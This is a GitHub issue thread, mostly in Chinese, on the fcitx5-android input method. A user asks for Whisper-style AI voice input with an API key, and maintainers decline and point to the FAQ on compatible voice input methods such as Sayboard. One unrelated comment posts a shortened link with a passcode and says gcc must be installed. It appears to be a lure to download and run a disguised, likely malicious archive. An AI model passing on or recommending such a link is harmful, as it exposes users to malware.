### ISSUE TITLE
支持ai 语音输入

### ISSUE THREAD

**Issue by fastfading** [fcitx5-android/fcitx5-android#586]
### 摘要 / Summary

支持ai 语音输入
现在很多ai语音asr  api    比如whisper  ， 
很多免费平台，比如
https://console.groq.com/docs/speech-text
请支持这些ai 语音输入。
ai 语音输入，效率极高， 错误极低。比现有所有输入法都好。

要求加入两个输入框
1. 输入 api key
2. 输入 提示词 promt   ， 提高识别率

### 系统版本 / OS Version

andriod

### 应用版本 / App Version

andriod

**Comment by yuncheng2024** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by eagleoflqj** [comment]
There will be no official support for proprietary 3rd-party input engines with an API key.

**Comment by Astoritin** [comment]
可以，够颠，想让小企鹅输入法学习商业输入法那套。
建议自己换一个百度输入法

**Comment by fastfading** [comment]
百度输入法  有办法支持吗

**Comment by fastfading** [comment]
不一定要是这个引擎啊，  
只需要一个接口让其支持语音输入。 
多一个这个功能

**Comment by fastfading** [comment]
[如何使用语音输入](https://fcitx5-android.github.io/faq/#_14)
在输入法设置的“键盘”页面，开启“显示语音输入按钮”选项后，若系统中有可用的语音输入法，键盘右上角的“收起键盘”按钮将会被替换为“语音输入”按钮，点击可以切换到可用的语音输入法。

Hint

对“语音输入法”的判断条件为： [android:imeSubtypeMode](https://developer.android.com/reference/android/view/inputmethod/InputMethodSubtype#attr_android:imeSubtypeMode) 的值为 "voice" 。

目前已知可以兼容的语音输入法有 Sayboard 和 Google 语音输入。

Sayboard[#](https://fcitx5-android.github.io/faq/#sayboard)
[Sayboard](https://github.com/ElishaAz/Sayboard) 是基于 [Vosk](https://alphacephei.com/vosk/android) 的开源语音输入法。您可以在 [GitHub Release](https://github.com/ElishaAz/Sayboard/releases) 或 [F-Droid](https://f-droid.org/en/packages/com.elishaazaria.sayboard/) 下载 Sayboard 。

安装并打开应用后，跟随其向导授予麦克风权限，并启用输入法。在使用语音输入前，需要在应用内下载模型，或在 https://alphacephei.com/vosk/models 手动下载并导入。


用这种方式有办法实现吗

**Comment by eagleoflqj** [comment]
你都找着文档了，照着试试啊，是文档说得不够详细吗

**Comment by fastfading** [comment]
ok  thanks

**Comment by fastfading** [comment]
https://fcitx5-android.github.io/faq/#_14

既然 google 可以用，  没有理由拒绝 
添加一个 新的  whisper api 啊

**Comment by eagleoflqj** [comment]
> 既然 google 可以用， 没有理由拒绝 添加一个 新的 whisper api 啊

google可以用是因为它自己本身能用，而不是f5a专门为google写了支持代码。API key在这个项目没有生存空间。
